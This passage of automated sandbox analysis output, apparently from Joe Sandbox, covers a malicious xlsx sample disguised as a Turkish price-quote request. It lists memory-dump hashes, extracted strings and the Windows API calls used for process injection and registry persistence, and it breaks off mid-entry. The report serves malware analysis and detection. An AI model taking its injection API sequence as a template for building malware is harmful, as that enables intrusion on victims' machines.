                                                  • Opcode ID: 4a6e4284f06d7464bc5edbe1f31751b31fc3956a01d6854e241b098bfc673647
                                                  • Instruction ID: 4c87161e6855dd6354cb9e406838a01cc688b95785743da963a03c2a41585934
                                                  • Opcode Fuzzy Hash: 4a6e4284f06d7464bc5edbe1f31751b31fc3956a01d6854e241b098bfc673647
                                                  • Instruction Fuzzy Hash: 67810930A05218CFD718CF49D684FD9F7B2FB88310F5682B5E9065B3A9D775A891CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f21bf5bcbab88c181e0a3d1e460563356f9b80528e55c0f694d7a1513b216c5
                                                  • Instruction ID: 562662e31c3dbfee22155da69d34c38c7f7324729ec43a094a000b867aff1835
                                                  • Opcode Fuzzy Hash: 2f21bf5bcbab88c181e0a3d1e460563356f9b80528e55c0f694d7a1513b216c5
                                                  • Instruction Fuzzy Hash: DC910C74A41219CFDB64DF29D955BADBBB2FB48300F5080EAD80EA7254DB346E81CF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8266ca498c506ba77f81afbbfde3785493101ef78f3358be4e95bd7f826af545
                                                  • Instruction ID: 92a0894bef40237fc9fa246c9240fdcde62d30dede9e2d9f1a3d7dd40af275bc
                                                  • Opcode Fuzzy Hash: 8266ca498c506ba77f81afbbfde3785493101ef78f3358be4e95bd7f826af545
                                                  • Instruction Fuzzy Hash: BB71F9B4E01209DFCB44DFA9D580AAEBBF6FF89300F508469E805AB354DB34A945CF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 682571b2fe809ea60be5e544fc88baa868bc93047a14a5a424567b1a7f7b18ad
                                                  • Instruction ID: ca0e75319030d9e56cee6c8febc60b701e06cf9fbbdbe7ecc15828ab9f26ed5e
                                                  • Opcode Fuzzy Hash: 682571b2fe809ea60be5e544fc88baa868bc93047a14a5a424567b1a7f7b18ad
                                                  • Instruction Fuzzy Hash: 2F61E9B4E01209DFCB44DFA9D580AAEBBF6FF89300F508469E809AB354DB34A945CF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85762533e98f8927983293dc08106cbf768cb5d74fd82c07e40e2851d59d836f
                                                  • Instruction ID: 0435121ff50cb58aadefd4d309cf341174a560e2871c61dc6e5c641818992327
                                                  • Opcode Fuzzy Hash: 85762533e98f8927983293dc08106cbf768cb5d74fd82c07e40e2851d59d836f
                                                  • Instruction Fuzzy Hash: D571E3B4906318CFEB15CFAAD884BADBBFABB4D304F5081A9D40AAB255D7745D81DF00
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb5ed12187583404890c3016f308acd3b33d25b85f68e97fea05bc34b5bb3ab1
                                                  • Instruction ID: ab62f81ca8b07e00ad33143840d96f8f9a6b2a60089877dd45dce4a8e5683938
                                                  • Opcode Fuzzy Hash: bb5ed12187583404890c3016f308acd3b33d25b85f68e97fea05bc34b5bb3ab1
                                                  • Instruction Fuzzy Hash: 7C5118B1E056588BDB19CF6BD84469ABBF3BFC9300F08C0BAC548AB265DB744985CF11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d58d352b4b861f53f17de621cebe03822f907a6b7c3ed00899266ac91c3cde8d
                                                  • Instruction ID: 887f0fa18166e90fa53f4f6d1cfdb111052314f583575c1618affd2d05ee441c
                                                  • Opcode Fuzzy Hash: d58d352b4b861f53f17de621cebe03822f907a6b7c3ed00899266ac91c3cde8d
                                                  • Instruction Fuzzy Hash: 2431C871E056188BDF28DF6BD8546DEBAF7BFCD300F14C0AA9449A7264DB304A959F40




                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq$(aq$Haq
                                                  • API String ID: 0-2456560092
                                                  • Opcode ID: d13cb32cd49ccb2f76514382db8059c0474402c049d9b816da326b96d0d5939c
                                                  • Instruction ID: 1019191d2693c11299e020f0a32a78a2d5c7ccdc691af838f04cf7bd85f4889e
                                                  • Opcode Fuzzy Hash: d13cb32cd49ccb2f76514382db8059c0474402c049d9b816da326b96d0d5939c
                                                  • Instruction Fuzzy Hash: 0AE11E34B00209DFCB18EF65D5949ADBBB2FF89300F508569E806AB364DB34ED46DB91

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$>$D
                                                  • API String ID: 0-1774137063
                                                  • Opcode ID: 9ee3a9cd749a0671a76a8d31e3d125fc029de9d4d9956439eb3a92776b76fea1
                                                  • Instruction ID: c907bdc8aecaa652617e857844927ea05841060a3c8aa16ce2be64b91473903f
                                                  • Opcode Fuzzy Hash: 9ee3a9cd749a0671a76a8d31e3d125fc029de9d4d9956439eb3a92776b76fea1
                                                  • Instruction Fuzzy Hash: 0351E3B4906269CFEB64CF59D888BEDB6F1BB08314F54A0EAD149B3280D7744AC9CF15

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 4f0ec10c97507c2a1606053ffe6e2153e994b3b09ca65e7e3ff1aa51b235c90f
                                                  • Instruction ID: 54f59405955d3ad3d1f2bc52bd61fb93edfdadbb32dd8646afdd2df555073f67
                                                  • Opcode Fuzzy Hash: 4f0ec10c97507c2a1606053ffe6e2153e994b3b09ca65e7e3ff1aa51b235c90f
                                                  • Instruction Fuzzy Hash: 1B226D74A012198FCB15DFA5D954EAEFBB2FF48300F148055E822AB394DB399D46CFA1

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061256251.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5760000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: c36a4fe7a4637f80835e5ca008f37cca9b755748b3f8d750adf9d5aa5253e9e6
                                                  • Instruction ID: 85c2535150fbb8c961169224db280468836285d9c12fc6fa44e8b136b0e2b9f9
                                                  • Opcode Fuzzy Hash: c36a4fe7a4637f80835e5ca008f37cca9b755748b3f8d750adf9d5aa5253e9e6
                                                  • Instruction Fuzzy Hash: 40F1D534E15208DFCB18DFA4E5986ACBBB2FF4A311F608129E806A7354DB355D86DF50

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq$d
                                                  • API String ID: 0-3557608343
                                                  • Opcode ID: e8120b02dcdc8fce8068528ff43509471f01d0cb1b076e5758a913f7e6058753
                                                  • Instruction ID: 963c6899898b30af7e7201d83d2043e83fee03ba675f47643bdafe356b143b7c
                                                  • Opcode Fuzzy Hash: e8120b02dcdc8fce8068528ff43509471f01d0cb1b076e5758a913f7e6058753
                                                  • Instruction Fuzzy Hash: E5D166306007068FCB24DF29C48496ABBF2FF88314B5A896DD45A8B365DB30FD42DB94

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061256251.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5760000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: d74eb119bd0027120688672b7befba5f36eb52acc3a67712140fbe5ad4cca403
                                                  • Instruction ID: 808446bff405ecd9cfdfe80449a20863ea72c41e9784030c7b7c7db176f3623b
                                                  • Opcode Fuzzy Hash: d74eb119bd0027120688672b7befba5f36eb52acc3a67712140fbe5ad4cca403
                                                  • Instruction Fuzzy Hash: DCA1D374E01209CFCB18EFA5D588ABDBBB6FF89311F908029E81267264CB345D46EF51

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq$Haq
                                                  • API String ID: 0-3785302501
                                                  • Opcode ID: e1ea706c0e743c796ef8f45c642956db92aa9c2901998673eb69e56956772109
                                                  • Instruction ID: 0ba71d195b23dd321e73fea2638674e7196a99ef726dd4678851c775684ca728
                                                  • Opcode Fuzzy Hash: e1ea706c0e743c796ef8f45c642956db92aa9c2901998673eb69e56956772109
                                                  • Instruction Fuzzy Hash: 4151AC307002158FC759AF79C454A2EBBB6FF9A600B5484ADD9068B3A5DF35EC03CBA1

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $\s]q
                                                  • API String ID: 0-2102667761
                                                  • Opcode ID: f771f5178a97a2772fcb563005e9d48329882dbb2a5dbfad406ce53ddebd306b
                                                  • Instruction ID: 9f5ee2bf16c42708dffb1751729ca140a70d1f1f2d0cd62a67b0de262bde7c13
                                                  • Opcode Fuzzy Hash: f771f5178a97a2772fcb563005e9d48329882dbb2a5dbfad406ce53ddebd306b
                                                  • Instruction Fuzzy Hash: FE71E4B490021ADFEF14CFA5D8847EEBBF1BB48304F159239C502AA290EB795595CB29

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $"
                                                  • API String ID: 0-3817095088
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $!
                                                  • API String ID: 0-2056089098
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$paq
                                                  • API String ID: 0-4101361271
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$D
                                                  • API String ID: 0-1610490911
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $C
                                                  • API String ID: 0-3643895422
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061256251.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5760000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: I$i
                                                  • API String ID: 0-1166825223
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S$f
                                                  • API String ID: 0-3296881712
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S$f
                                                  • API String ID: 0-3296881712
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq
                                                  • API String ID: 0-3092978723
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (_]q
                                                  • API String ID: 0-188044275
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05B1595F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05B1595F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  APIs
                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05B18063
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CopyFile
                                                  • String ID:
                                                  • API String ID: 1304948518-0
                                                  APIs
                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05B18063
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CopyFile
                                                  • String ID:
                                                  • API String ID: 1304948518-0
                                                  APIs
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 05B18528
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  APIs
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 05B18528
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q
                                                  • API String ID: 0-1007455737
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 05B182B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 05B182B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05B16243
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05B16243
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B160BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B16704
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B160BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B16704
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B15B5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B15B5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
